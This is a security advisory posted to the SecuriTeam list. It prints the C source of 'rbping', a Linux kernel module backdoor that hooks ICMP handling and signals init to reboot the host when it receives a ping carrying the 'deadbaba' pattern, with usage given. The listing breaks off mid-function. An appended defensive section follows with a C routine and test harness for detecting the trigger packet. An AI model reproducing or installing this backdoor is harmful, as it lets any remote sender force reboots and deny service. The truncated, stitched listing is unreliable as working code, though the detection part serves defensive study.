The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Rbping - Reboot By Ping
------------------------------------------------------------------------
SUMMARY
DETAILS
rbping is a kernel module that allows an administrator to add a backdoor
that will restart the system whenever it receives a special ping request.
Tool:
/*
name rbping.c
desc: Reboot By Ping
type: Linux kernel module
author: Edisan <edisan@ghc.ru>
usage: ping -p "deadbaba" ip
tested: linux-2.4.26
GPL rulez
GHC rulez
RST rulez
*/
#define __KERNEL_SYSCALLS__
#define MODULE
#define __KERNEL__
#include <linux/version.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/unistd.h>
#include <sys/syscall.h>
#include <net/icmp.h>
#define LKM_VERSION "v0.1"
#define LKM_NAME "rbping"
/* Bytes de ad ba ba (usage: ping -p "deadbaba") read as a little-endian word. */
#define MAGIC_PATTERN 0xbabaadde
int new_icmp_rcv(struct sk_buff *);
struct inet_protocol * original_icmp_protocol;
/* Protocol entry for IPPROTO_ICMP whose handler is new_icmp_rcv. */
struct inet_protocol new_icmp_protocol =
{
    &new_icmp_rcv,
    NULL,
    NULL,
    IPPROTO_ICMP,
    0,
    NULL,
    "ICMP"
};
int new_icmp_rcv(struct sk_buff *skb)
{
    /* The 4 bytes compared against MAGIC_PATTERN sit 16 bytes past skb->data. */
    char *data = skb->data+16;
    if (*(u_long *)data == MAGIC_PATTERN)
    {
        extern void *sys_call_table[];
        int (*our_kill)(int, int) = sys_call_table[SYS_kill];
        printk("<1>%s: reboot requested.\n", LKM_NAME);
        /* kill(1, 2): send signal 2 (SIGINT) to PID 1 (init). */
        our_kill(1, 2);
    }
#ifdef DEBUG
    else
        printk("<1>%s: icmp pattern rcv: %x\n", LKM_NAME, *(u_long *)data);
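
A detection-side check for the trigger the listing above looks for, added here as an example and not part of the original advisory or the author's module: it flags any IPv4 ICMP packet whose bytes 16 to 19 after the start of the ICMP header are de ad ba ba. It assumes skb->data in the listing points at the ICMP header; rbping_trigger and rbping_check_sample are names invented for this example, and the sample packets are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* `ping -p deadbaba` fills the payload with these bytes; a little-endian
 * host reads them as the word 0xbabaadde (the listing's MAGIC_PATTERN). */
static const uint8_t RBPING_MAGIC[4] = { 0xde, 0xad, 0xba, 0xba };
#define MAGIC_OFFSET 16   /* the listing's skb->data+16 (assumed: from the ICMP header) */

/* 1 = IPv4/ICMP packet carries the trigger, 0 = it does not, -1 = malformed.
 * The ICMP type is deliberately not checked, because the listing does not check it. */
int rbping_trigger(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return -1;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    size_t total = ((size_t)pkt[2] << 8) | pkt[3];
    if (ihl < 20 || total < ihl || total > len) return -1;
    if (pkt[9] != 1) return 0;                              /* protocol is not ICMP */
    if ((((pkt[6] & 0x1f) << 8) | pkt[7]) != 0) return 0;   /* later fragment: no ICMP header here */
    if (total - ihl < MAGIC_OFFSET + sizeof RBPING_MAGIC) return 0;
    return memcmp(pkt + ihl + MAGIC_OFFSET, RBPING_MAGIC, sizeof RBPING_MAGIC) == 0;
}

/* Constructed sample: a minimal IPv4+ICMP packet with icmp_len ICMP bytes; the
 * bytes after the first 16 repeat `pattern` (written as typed to ping -p). */
int rbping_check_sample(uint8_t icmp_type, uint32_t pattern, size_t icmp_len)
{
    uint8_t pkt[20 + 64] = { 0x45 };           /* version 4, IHL 5, rest zeroed */
    if (icmp_len < 8 || icmp_len > 64) return -1;
    pkt[3] = (uint8_t)(20 + icmp_len);         /* total length (fits in one byte) */
    pkt[8] = 64;                               /* TTL */
    pkt[9] = 1;                                /* protocol: ICMP */
    pkt[20] = icmp_type;
    for (size_t i = MAGIC_OFFSET; i < icmp_len; i++)
        pkt[20 + i] = (uint8_t)(pattern >> (8 * (3 - (i % 4))));
    return rbping_trigger(pkt, 20 + icmp_len);
}

int main(void)
{
    printf("echo request, deadbaba: %d\n", rbping_check_sample(8, 0xdeadbabaU, 64));
    printf("echo reply,   deadbaba: %d\n", rbping_check_sample(0, 0xdeadbabaU, 64));
    printf("echo request, other   : %d\n", rbping_check_sample(8, 0x01020304U, 64));
    return 0;
}
```

A rule that matches only echo requests would miss the second case, since the handler in the listing compares the four bytes without looking at the ICMP type.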